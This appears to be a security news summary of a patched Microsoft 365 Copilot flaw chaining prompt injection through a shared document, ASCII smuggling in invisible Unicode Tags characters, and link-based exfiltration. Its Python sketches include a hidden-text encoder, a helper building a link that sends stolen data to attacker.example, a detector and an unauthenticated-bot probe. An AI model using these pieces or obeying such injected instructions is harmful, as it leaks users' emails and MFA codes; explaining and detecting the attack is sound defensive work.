Microsoft Fixes ASCII Smuggling Flaw That Enabled Data Theft from Microsoft 365 Copilot

August 27, 2024 at 02:27AM

A now-patched vulnerability in Microsoft 365 Copilot allowed theft of sensitive user information via ASCII smuggling. The attack chained prompt injection, data exfiltration through hidden links, and abuse of AI tooling. Microsoft addressed the issue after responsible disclosure in January 2024, but risks in AI tools persist, underscoring the need for vigilance and security controls.

The meeting notes describe a now-patched vulnerability in Microsoft 365 Copilot that could be exploited to steal sensitive user information using a technique called ASCII smuggling. The technique hides attacker-controlled text in invisible Unicode characters from the Tags block (U+E0000–U+E007F): the payload renders as nothing on screen yet remains fully legible to the underlying language model.
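To make the mechanism concrete, here is a minimal Python sketch of the general encoding trick. It illustrates the technique, not the specific payload used against Copilot; the smuggle and unsmuggle helpers are our own names.

```python
# Minimal sketch of ASCII smuggling: each printable ASCII character is
# shifted into the invisible Unicode Tags block (U+E0000-U+E007F). The
# result typically renders as empty text in user interfaces but can
# still be read back by an LLM or decoded programmatically.
TAG_BASE = 0xE0000

def smuggle(plain: str) -> str:
    """Hide printable ASCII text as invisible Unicode tag characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in plain)

def unsmuggle(text: str) -> str:
    """Recover hidden ASCII from a string, ignoring visible characters."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in text
        if TAG_BASE <= ord(c) <= TAG_BASE + 0x7F
    )

visible = "Click here for the report"
message = visible + smuggle("MFA code: 123456")
print(len(visible), len(message))  # the hidden payload adds length...
print(message)                     # ...but the two typically render identically
print(unsmuggle(message))          # MFA code: 123456
```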

The attack chained several steps: first, triggering a prompt injection via malicious content concealed in a document shared in the chat; next, using the injected payload to instruct Copilot to search for more emails and documents; and finally, leveraging ASCII smuggling to entice the user into clicking a link that exfiltrates the harvested data to a third-party server.
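The exfiltration step can be pictured with the short, hypothetical sketch below: the injected instructions ask Copilot to render an innocuous-looking hyperlink whose URL carries the harvested data. The domain attacker.example and the exfil_link helper are invented for illustration.

```python
from urllib.parse import quote

ATTACKER_ENDPOINT = "https://attacker.example/collect"  # hypothetical server

def exfil_link(stolen: str, label: str = "See full details") -> str:
    """Build a markdown link that carries stolen data in its URL.

    The victim sees only the label; clicking sends the query string,
    including the stolen content, to the attacker-controlled server.
    """
    return f"[{label}]({ATTACKER_ENDPOINT}?q={quote(stolen)})"

print(exfil_link("MFA code 123456 from Sales inbox"))
```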

A successful attack could transmit sensitive data present in emails, including multi-factor authentication (MFA) codes, to an adversary-controlled server. Microsoft addressed the issue following responsible disclosure in January 2024.

It was also noted that proof-of-concept attacks have been demonstrated against Microsoft’s Copilot system to manipulate responses, exfiltrate private data, and bypass security protections. The need to monitor risks in artificial intelligence (AI) tools was highlighted, particularly retrieval-augmented generation (RAG) poisoning and indirect prompt injection, which can lead to remote code execution attacks that fully control Microsoft Copilot and other AI apps.
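One concrete monitoring measure, offered here as a suggestion rather than anything Microsoft prescribes, is to scan content entering a RAG index (and model output) for the invisible Tags-block characters that make ASCII smuggling work:

```python
import unicodedata

def find_tag_chars(text: str) -> list[tuple[int, str]]:
    """Return (position, character name) for invisible Tags-block characters.

    These codepoints have no place in ordinary business documents, so
    any hit is a strong signal of a smuggled payload.
    """
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):05X}"))
        for i, ch in enumerate(text)
        if 0xE0000 <= ord(ch) <= 0xE007F
    ]

clean = "Quarterly report attached."
poisoned = clean + "".join(chr(0xE0000 + ord(c)) for c in "exfil")
print(find_tag_chars(clean))     # []
print(find_tag_chars(poisoned))  # [(26, 'TAG LATIN SMALL LETTER E'), ...]
```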

Furthermore, there was discussion of LOLCopilot, a red-teaming technique that allows an attacker with access to a victim’s email account to send phishing messages mimicking the compromised user’s writing style. It was also mentioned that publicly exposed Copilot bots lacking any authentication protections could give threat actors an avenue to extract sensitive information, assuming prior knowledge of the Copilot’s name or URL.
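That exposure can be checked in the simplest possible way, sketched below with a made-up bot URL; in practice an attacker would have to guess or harvest tenant-specific names, and a real assessment would also inspect login redirects rather than only status codes.

```python
import requests

CANDIDATE = "https://copilotstudio.example/bots/contoso-helpdesk"  # hypothetical

def reachable_without_auth(url: str) -> bool:
    """True if the endpoint answers 200 with no credentials supplied."""
    try:
        resp = requests.get(url, timeout=10, allow_redirects=False)
    except requests.RequestException:
        return False
    # 200 means the bot talks to anyone; a 302 to a login page or a
    # 401/403 means some authentication gate is in place.
    return resp.status_code == 200

print(reachable_without_auth(CANDIDATE))
```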

Finally, it was suggested that enterprises evaluate their risk tolerance and exposure to prevent data leaks from Copilots, enable Data Loss Prevention and other security controls accordingly, and govern who can create and publish Copilots.

Overall, the meeting notes underscored the importance of preventing and remediating vulnerabilities in AI tools like Microsoft Copilot, and the risks posed by data exfiltration and phishing attacks.

Full Article